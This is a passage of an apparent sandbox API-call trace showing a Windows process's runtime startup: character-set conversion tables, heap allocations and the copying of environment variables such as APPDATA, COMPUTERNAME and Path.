¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18ead8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ²Nm§\x14í\x18", lpUsedDefaultChar=0x0) returned 256 [0039.068] GetLastError () returned 0x0 [0039.068] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0039.068] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e318, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0039.068] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18e9d8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ²Nm§\x14í\x18", lpUsedDefaultChar=0x0) returned 256 [0039.073] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0039.073] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x431d5b) returned 0x405c62 [0039.105] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x682af8) returned 0x80 [0039.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0039.116] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x1f) returned 0x681398 [0039.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x681398, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 31 [0039.121] GetLastError () returned 0x0 [0039.121] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x673a80, Size=0x8) returned 0x673a80 [0039.121] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0039.121] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x36) returned 0x682da8 [0039.121] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x682da8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpUsedDefaultChar=0x0) returned 54 [0039.121] GetLastError () returned 0x0 [0039.126] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x673a80, Size=0xc) returned 0x682de8 [0039.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0039.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x37) returned 0x682e00 [0039.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x682e00, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 55 [0039.126] GetLastError () returned 0x0 [0039.126] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x682de8, Size=0x10) returned 0x682de8 [0039.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0039.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x3c) returned 0x676a38 [0039.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x676a38, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 60 [0039.126] GetLastError () returned 0x0 [0039.126] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x682de8, Size=0x14) returned 0x682e40 [0039.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0039.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x31) returned 0x682e60 [0039.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x682e60, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramW6432=C:\\Program Files\\Common Files", lpUsedDefaultChar=0x0) returned 49 [0039.126] GetLastError () returned 0x0 [0039.126] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x682e40, Size=0x18) returned 0x682e40 [0039.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0039.126] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x17) returned 0x677d50 [0039.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x677d50, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPUTERNAME=XDUWTFONO", lpUsedDefaultChar=0x0) returned 23 [0039.127] GetLastError () returned 0x0 [0039.127] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x682e40, Size=0x1c) returned 0x682ea0 [0039.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0039.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x24) returned 0x67ce60 [0039.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x67ce60, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ComSpec=C:\\Windows\\system32\\cmd.exe", lpUsedDefaultChar=0x0) returned 36 [0039.127] GetLastError () returned 0x0 [0039.127] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x682ea0, Size=0x20) returned 0x682ea0 [0039.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0039.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x14) returned 0x677d70 [0039.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x677d70, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FP_NO_HOST_CHECK=NO", lpUsedDefaultChar=0x0) returned 20 [0039.127] GetLastError () returned 0x0 [0039.127] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x682ea0, Size=0x24) returned 0x682ea0 [0039.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0039.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0xd) returned 0x680ae8 [0039.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x680ae8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEDRIVE=C:", lpUsedDefaultChar=0x0) returned 13 [0039.127] GetLastError () returned 0x0 [0039.127] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x682ea0, Size=0x28) returned 0x682ea0 [0039.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0039.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x25) returned 0x67ce90 [0039.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x67ce90, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 37 [0039.127] GetLastError () returned 0x0 [0039.127] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x682ea0, Size=0x2c) returned 0x682ea0 [0039.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0039.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x39) returned 0x676a80 [0039.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x676a80, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpUsedDefaultChar=0x0) returned 57 [0039.127] GetLastError () returned 0x0 [0039.127] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x682ea0, Size=0x30) returned 0x682ea0 [0039.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0039.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x18) returned 0x677d90 [0039.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x677d90, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOGONSERVER=\\\\XDUWTFONO", lpUsedDefaultChar=0x0) returned 24 [0039.127] GetLastError () returned 0x0 [0039.127] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x682ea0, Size=0x34) returned 0x682ea0 [0039.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0039.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x17) returned 0x677db0 [0039.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x677db0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NUMBER_OF_PROCESSORS=1", lpUsedDefaultChar=0x0) returned 23 [0039.128] GetLastError () returned 0x0 [0039.128] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x682ea0, Size=0x38) returned 0x682ea0 [0039.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0039.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0xe) returned 0x680b00 [0039.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x680b00, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OS=Windows_NT", lpUsedDefaultChar=0x0) returned 14 [0039.128] GetLastError () returned 0x0 [0039.128] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x682ea0, Size=0x3c) returned 0x682ea0 [0039.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 105 [0039.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x69) returned 0x682ee8 [0039.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x682ee8, cbMultiByte=105, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpUsedDefaultChar=0x0) returned 105 [0039.128] GetLastError () returned 0x0 [0039.128] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x682ea0, Size=0x40) returned 0x682ea0 [0039.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0039.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x3e) returned 0x676ac8 [0039.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x676ac8, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", lpUsedDefaultChar=0x0) returned 62 [0039.128] GetLastError () returned 0x0 [0039.128] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x682ea0, Size=0x44) returned 0x682f60 [0039.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0039.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x1b) returned 0x6813c0 [0039.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x6813c0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITECTURE=x86", lpUsedDefaultChar=0x0) returned 27 [0039.128] GetLastError () returned 0x0 [0039.128] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x682f60, Size=0x48) returned 0x682f60 [0039.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0039.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x1d) returned 0x6813e8 [0039.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x6813e8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITEW6432=AMD64", lpUsedDefaultChar=0x0) returned 29 [0039.128] GetLastError () returned 0x0 [0039.128] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x682f60, Size=0x4c) returned 0x682f60 [0039.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 94 Stepping 3, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0039.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x48) returned 0x6791e8 [0039.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 94 Stepping 3, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x6791e8, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 94 Stepping 3, GenuineIntel", lpUsedDefaultChar=0x0) returned 72 [0039.128] GetLastError () returned 0x0 [0039.128] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x682f60, Size=0x50) returned 0x682f60 [0039.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0039.129] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x12) returned 0x677dd0 [0039.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x677dd0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_LEVEL=6", lpUsedDefaultChar=0x0) returned 18 [0039.129] GetLastError () returned 0x0 